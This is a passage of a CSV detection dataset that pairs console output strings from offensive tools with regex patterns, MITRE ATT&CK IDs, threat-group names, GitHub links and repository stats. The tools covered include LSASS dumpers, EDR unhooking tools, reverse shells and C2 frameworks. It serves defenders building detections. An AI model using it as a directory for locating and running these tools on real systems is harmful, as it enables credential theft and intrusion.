iterations*",".{0,1000}\[\+\]\sLoading\sBetterXencrypt\sand\sdoing\ssome\sencryption\swith\srandom\siterations.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13215" "*[+] Loading PSObfuscation and randomizing script*",".{0,1000}\[\+\]\sLoading\sPSObfuscation\sand\srandomizing\sscript.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13216" "*[+] Loading PyFuscation and doing $some obfuscation*",".{0,1000}\[\+\]\sLoading\sPyFuscation\sand\sdoing\s\$some\sobfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13217" "*[+] Looking for the SSN via Halos Gate*",".{0,1000}\[\+\]\sLooking\sfor\sthe\sSSN\svia\sHalos\sGate.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#content","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","13218" "*[+] LSAKEY(s) retrieving*",".{0,1000}\[\+\]\sLSAKEY\(s\)\sretrieving.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - 
PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","#content","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","13219" "*[+] LSASS dump created successfully.*",".{0,1000}\[\+\]\sLSASS\sdump\screated\ssuccessfully\..{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","13220" "*[+] LSASS dump done!*",".{0,1000}\[\+\]\sLSASS\sdump\sdone!.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13221" "*[+] LSASS Dump Read: *",".{0,1000}\[\+\]\sLSASS\sDump\sRead\:\s.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","13222" "*[+] LSASS Dump Read: *",".{0,1000}\[\+\]\sLSASS\sDump\sRead\:\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13223" "*[+] Malicious named pipe running on 
*",".{0,1000}\[\+\]\sMalicious\snamed\spipe\srunning\son\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13224" "*[+] Mimi Loaded *",".{0,1000}\[\+\]\sMimi\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13225" "*[+] MIND YOUR OPSEC! Serving Pyramid files from folder *",".{0,1000}\[\+\]\sMIND\sYOUR\sOPSEC!\sServing\sPyramid\sfiles\sfrom\sfolder\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#content","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13226" "*[+] Minidump successfully saved to memory*",".{0,1000}\[\+\]\sMinidump\ssuccessfully\ssaved\sto\smemory.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","#content","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","13227" "*[+] MOTD backdoor persistence establish*",".{0,1000}\[\+\]\sMOTD\sbackdoor\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a 
highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13228" "*[+] My personal simple and stupid Token Stealer... *",".{0,1000}\[\+\]\sMy\spersonal\ssimple\sand\sstupid\s\sToken\sStealer\.\.\.\s.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","13229" "*[+] Nameless Terminal*",".{0,1000}\[\+\]\sNameless\sTerminal.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","13230" "*[+] New incoming shell from : *",".{0,1000}\[\+\]\sNew\sincoming\sshell\sfrom\s\:\s.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#content","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","13231" "*[+] No insecure resource delegations found. 
Eureka!*",".{0,1000}\[\+\]\sNo\sinsecure\sresource\sdelegations\sfound\.\sEureka!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","#content","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13232" "*[+] No insecure trustee delegations found. Eureka!*",".{0,1000}\[\+\]\sNo\sinsecure\strustee\sdelegations\sfound\.\sEureka!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","#content","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13233" "*[+] No PID provided, creating a new calc.exe process and using its PID*",".{0,1000}\[\+\]\sNo\sPID\sprovided,\screating\sa\snew\scalc\.exe\sprocess\sand\susing\sits\sPID.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#content","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","13234" "*[+] NtAllocateVirtualMemory Not Hooked*",".{0,1000}\[\+\]\sNtAllocateVirtualMemory\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13235" "*[+] NTDLL unhooking 
enabled*",".{0,1000}\[\+\]\sNTDLL\sunhooking\senabled.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13236" "*[+] NTDLL unhooking enabled*",".{0,1000}\[\+\]\sNTDLL\sunhooking\senabled.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13237" "*[+] NtProtectVirtualMemory Not Hooked*",".{0,1000}\[\+\]\sNtProtectVirtualMemory\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13239" "*[+] NtWaitForSingleObject Not Hooked*",".{0,1000}\[\+\]\sNtWaitForSingleObject\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13240" "*[+] Nuke is landing.*",".{0,1000}\[\+\]\sNuke\sis\slanding\..{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#content","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","13241" "*[+] Obtained ADSync service account token from miiserver process*",".{0,1000}\[\+\]\sObtained\sADSync\sservice\saccount\stoken\sfrom\smiiserver\sprocess.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","#content","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","13242" "*[+] OK! I Closed The Two Socket.*",".{0,1000}\[\+\]\sOK!\sI\sClosed\sThe\sTwo\sSocket\..{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. 
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","13243" "*[+] Opened Process Token Sucessufully!*",".{0,1000}\[\+\]\sOpened\sProcess\sToken\sSucessufully!.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","#content","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","13244" "*[+] overwriting modprobe_path with different PIDs *",".{0,1000}\[\+\]\soverwriting\smodprobe_path\swith\sdifferent\sPIDs\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","13245" "*[+] Parsed Procmon output for potential DLL hijack paths!*",".{0,1000}\[\+\]\sParsed\sProcmon\soutput\sfor\spotential\sDLL\shijack\spaths!.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","0","#content","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","13246" "*[+] Parsing SAM registry hive*",".{0,1000}\[\+\]\sParsing\sSAM\sregistry\shive.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract 
credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","#content","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","13247" "*[+] Parsing SAM registry hive*",".{0,1000}\[\+\]\sParsing\sSAM\sregistry\shive.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#content","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","13248" "*[+] Parsing SECURITY registry hive*",".{0,1000}\[\+\]\sParsing\sSECURITY\sregistry\shive.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","#content","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","13249" "*[+] Parsing SECURITY registry hive*",".{0,1000}\[\+\]\sParsing\sSECURITY\sregistry\shive.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#content","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","13250" "*[+] Payload DLL successfully loaded after*",".{0,1000}\[\+\]\sPayload\sDLL\ssuccessfully\sloaded\safter.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/itm4n/PPLmedic","1","0","#content","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","13251" "*[+] Payload executed successfully*",".{0,1000}\[\+\]\sPayload\sexecuted\ssuccessfully.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#content","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","13252" "*[+] Payload format: pwsh*",".{0,1000}\[\+\]\sPayload\sformat\:\spwsh.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13253" "*[+] PE Loader mode is selected!*",".{0,1000}\[\+\]\sPE\sLoader\smode\sis\sselected!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#content","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13254" "*[+] Performing recursive ShadowSpray attack. 
This might take a while*",".{0,1000}\[\+\]\sPerforming\srecursive\sShadowSpray\sattack\.\sThis\smight\stake\sa\swhile.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13255" "*[+] PInject Loaded *",".{0,1000}\[\+\]\sPInject\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13256" "*[+] Pipe listing:*",".{0,1000}\[\+\]\sPipe\slisting\:.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","13257" "*[+] Poc By @404death *",".{0,1000}\[\+\]\sPoc\sBy\s\@404death\s.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#content","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","13258" "*[+] PocScan 
*",".{0,1000}\[\+\]\sPocScan\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#content","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","13259" "*[+] Polymorphic encryption*",".{0,1000}\[\+\]\sPolymorphic\sencryption.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#content","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13260" "*[+] popping root shell*",".{0,1000}\[\+\]\spopping\sroot\sshell.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","13261" "*[+] Potenatially Hijackable DLL: *",".{0,1000}\[\+\]\sPotenatially\sHijackable\sDLL\:\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","#content","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","13262" "*[+] PowershellKerberos Loaded*",".{0,1000}\[\+\]\sPowershellKerberos\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13263" "*[+] PowerView Loaded *",".{0,1000}\[\+\]\sPowerView\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13264" "*[+] PowerView Loaded*",".{0,1000}\[\+\]\sPowerView\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13265" "*[+] PPID spoofing enabled*",".{0,1000}\[\+\]\sPPID\sspoofing\senabled.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#content","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","13266" "*[+] PPID Spoofing has been disabled*",".{0,1000}\[\+\]\sPPID\sSpoofing\shas\sbeen\sdisabled.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13267" "*[+] PPID Spoofing has been disabled*",".{0,1000}\[\+\]\sPPID\sSpoofing\shas\sbeen\sdisabled.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13268" "*[+] printing b64encoded(zipped(cradle.py)) for scriptless execution on terminal:*",".{0,1000}\[\+\]\sprinting\sb64encoded\(zipped\(cradle\.py\)\)\sfor\sscriptless\sexecution\son\sterminal\:.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#content","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13269" "*[+] Privileged file copy success! 
*",".{0,1000}\[\+\]\sPrivileged\sfile\scopy\ssuccess!\s.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike default content strings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","13270" "*[+] Proxy blanket set successfully*",".{0,1000}\[\+\]\sProxy\sblanket\sset\ssuccessfully.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - 
T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","13271" "*[+] PSAsyncShell OK!*",".{0,1000}\[\+\]\sPSAsyncShell\sOK!.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","#content","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","13272" "*[+] Pyramid HTTP Server listening on port *",".{0,1000}\[\+\]\sPyramid\sHTTP\sServer\slistening\son\sport\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#content","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13273" "*[+] Querying DC without Global Catalog: *",".{0,1000}\[\+\]\sQuerying\sDC\swithout\sGlobal\sCatalog\:\s.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","#content","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","13274" "*[+] Randomizing syscall names*",".{0,1000}\[\+\]\sRandomizing\ssyscall\snames.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#content","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","13275" "*[+] Rasman service is 
